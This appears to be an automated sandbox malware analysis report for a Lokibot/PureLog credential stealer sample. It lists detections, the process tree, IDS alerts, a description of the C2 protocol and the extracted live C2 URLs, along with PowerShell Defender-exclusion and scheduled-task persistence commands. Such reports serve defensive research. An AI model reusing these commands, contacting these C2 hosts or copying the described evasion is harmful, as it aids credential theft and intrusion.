Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-0Y9005373R664.exe

Overview

General Information

Sample name:PO-0Y9005373R664.exe
Analysis ID:1501076
MD5:8c71713fd5663bcbe87118fc47de3ec5
SHA1:059fd7d974e27726130b662af7cb5f45bac388b5
SHA256:a977afa9d254b586f73b50eed60be03e124cee9bf9b1da069dc7d5fbcd24222b
Tags:exe
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO-0Y9005373R664.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\PO-0Y9005373R664.exe" MD5: 8C71713FD5663BCBE87118FC47DE3EC5)
    • powershell.exe (PID: 4528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5660 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO-0Y9005373R664.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\PO-0Y9005373R664.exe" MD5: 8C71713FD5663BCBE87118FC47DE3EC5)
  • VvtddClQv.exe (PID: 3788 cmdline: C:\Users\user\AppData\Roaming\VvtddClQv.exe MD5: 8C71713FD5663BCBE87118FC47DE3EC5)
    • schtasks.exe (PID: 6476 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VvtddClQv.exe (PID: 4780 cmdline: "C:\Users\user\AppData\Roaming\VvtddClQv.exe" MD5: 8C71713FD5663BCBE87118FC47DE3EC5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://104.248.205.66/index.php/17008709"]}
SourceRuleDescriptionAuthorStrings
PO-0Y9005373R664.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\VvtddClQv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x178a0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x4c6b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              Click to see the 45 entries
              SourceRuleDescriptionAuthorStrings
              0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.PO-0Y9005373R664.exe.2aa9d1c.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  10.2.VvtddClQv.exe.29b9d20.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.PO-0Y9005373R664.exe.5500000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.PO-0Y9005373R664.exe.3d25e58.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 62 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ProcessId: 4528, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ProcessId: 4528, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VvtddClQv.exe, ParentImage: C:\Users\user\AppData\Roaming\VvtddClQv.exe, ParentProcessId: 3788, ParentProcessName: VvtddClQv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp", ProcessId: 6476, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", ProcessId: 5660, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ProcessId: 4528, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-0Y9005373R664.exe", ParentImage: C:\Users\user\Desktop\PO-0Y9005373R664.exe, ParentProcessId: 6964, ParentProcessName: PO-0Y9005373R664.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp", ProcessId: 5660, ProcessName: schtasks.exe
                        Timestamp:2024-08-29T12:03:19.308276+0200
                        SID:2021641
                        Severity:1
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:19.308276+0200
                        SID:2025381
                        Severity:1
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:03.565317+0200
                        SID:2021641
                        Severity:1
                        Source Port:49725
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:03.565317+0200
                        SID:2025381
                        Severity:1
                        Source Port:49725
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:29.944426+0200
                        SID:2024313
                        Severity:1
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:29.944426+0200
                        SID:2024318
                        Severity:1
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:01.038490+0200
                        SID:2021641
                        Severity:1
                        Source Port:49723
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:01.038490+0200
                        SID:2025381
                        Severity:1
                        Source Port:49723
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:44.823782+0200
                        SID:2021641
                        Severity:1
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:44.823782+0200
                        SID:2025381
                        Severity:1
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:14.298157+0200
                        SID:2021641
                        Severity:1
                        Source Port:49729
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:14.298157+0200
                        SID:2025381
                        Severity:1
                        Source Port:49729
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:16.846754+0200
                        SID:2021641
                        Severity:1
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:16.846754+0200
                        SID:2025381
                        Severity:1
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:14.840104+0200
                        SID:2024313
                        Severity:1
                        Source Port:49753
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:14.840104+0200
                        SID:2024318
                        Severity:1
                        Source Port:49753
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:32.405549+0200
                        SID:2024313
                        Severity:1
                        Source Port:49760
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:32.405549+0200
                        SID:2024318
                        Severity:1
                        Source Port:49760
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:11.041687+0200
                        SID:2024313
                        Severity:1
                        Source Port:49727
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:11.041687+0200
                        SID:2024318
                        Severity:1
                        Source Port:49727
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:29.282132+0200
                        SID:2021641
                        Severity:1
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:29.282132+0200
                        SID:2025381
                        Severity:1
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:05.911113+0200
                        SID:2024313
                        Severity:1
                        Source Port:49725
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:05.911113+0200
                        SID:2024318
                        Severity:1
                        Source Port:49725
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:06.065702+0200
                        SID:2021641
                        Severity:1
                        Source Port:49726
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:06.065702+0200
                        SID:2025381
                        Severity:1
                        Source Port:49726
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:20.114259+0200
                        SID:2021641
                        Severity:1
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:20.114259+0200
                        SID:2025381
                        Severity:1
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:07.063527+0200
                        SID:2024313
                        Severity:1
                        Source Port:49750
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:07.063527+0200
                        SID:2024318
                        Severity:1
                        Source Port:49750
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:16.695709+0200
                        SID:2024313
                        Severity:1
                        Source Port:49729
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:16.695709+0200
                        SID:2024318
                        Severity:1
                        Source Port:49729
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:25.029294+0200
                        SID:2024313
                        Severity:1
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:25.029294+0200
                        SID:2024318
                        Severity:1
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:24.159761+0200
                        SID:2024313
                        Severity:1
                        Source Port:49732
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:24.159761+0200
                        SID:2024318
                        Severity:1
                        Source Port:49732
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:54.762512+0200
                        SID:2024313
                        Severity:1
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:54.762512+0200
                        SID:2024318
                        Severity:1
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:29.124410+0200
                        SID:2024313
                        Severity:1
                        Source Port:49734
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:29.124410+0200
                        SID:2024318
                        Severity:1
                        Source Port:49734
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:39.676820+0200
                        SID:2024313
                        Severity:1
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:39.676820+0200
                        SID:2024318
                        Severity:1
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:56.085560+0200
                        SID:2021641
                        Severity:1
                        Source Port:49715
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:02:56.085560+0200
                        SID:2025381
                        Severity:1
                        Source Port:49715
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:26.573742+0200
                        SID:2024313
                        Severity:1
                        Source Port:49733
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:26.573742+0200
                        SID:2024318
                        Severity:1
                        Source Port:49733
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:37.279739+0200
                        SID:2024313
                        Severity:1
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:37.279739+0200
                        SID:2024318
                        Severity:1
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:24.315194+0200
                        SID:2021641
                        Severity:1
                        Source Port:49733
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:24.315194+0200
                        SID:2025381
                        Severity:1
                        Source Port:49733
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:02:53.568454+0200
                        SID:2021641
                        Severity:1
                        Source Port:49714
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:02:53.568454+0200
                        SID:2025381
                        Severity:1
                        Source Port:49714
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:11.192104+0200
                        SID:2021641
                        Severity:1
                        Source Port:49728
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:11.192104+0200
                        SID:2025381
                        Severity:1
                        Source Port:49728
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:04:17.720151+0200
                        SID:2021641
                        Severity:1
                        Source Port:49755
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:04:17.720151+0200
                        SID:2025381
                        Severity:1
                        Source Port:49755
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:54.915658+0200
                        SID:2021641
                        Severity:1
                        Source Port:49746
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:54.915658+0200
                        SID:2025381
                        Severity:1
                        Source Port:49746
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:08.690898+0200
                        SID:2021641
                        Severity:1
                        Source Port:49727
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:08.690898+0200
                        SID:2025381
                        Severity:1
                        Source Port:49727
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:59.879049+0200
                        SID:2021641
                        Severity:1
                        Source Port:49748
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-29T12:03:59.879049+0200
                        SID:2025381
                        Severity:1
                        Source Port:49748
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:57.235849+0200
                        SID:2024313
                        Severity:1
                        Source Port:49746
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:57.235849+0200
                        SID:2024318
                        Severity:1
                        Source Port:49746
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:08.538051+0200
                        SID:2024313
                        Severity:1
                        Source Port:49726
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:08.538051+0200
                        SID:2024318
                        Severity:1
                        Source Port:49726
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-29T12:03:31.573054+0200
                        SID:2024313
                        Severity:1
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
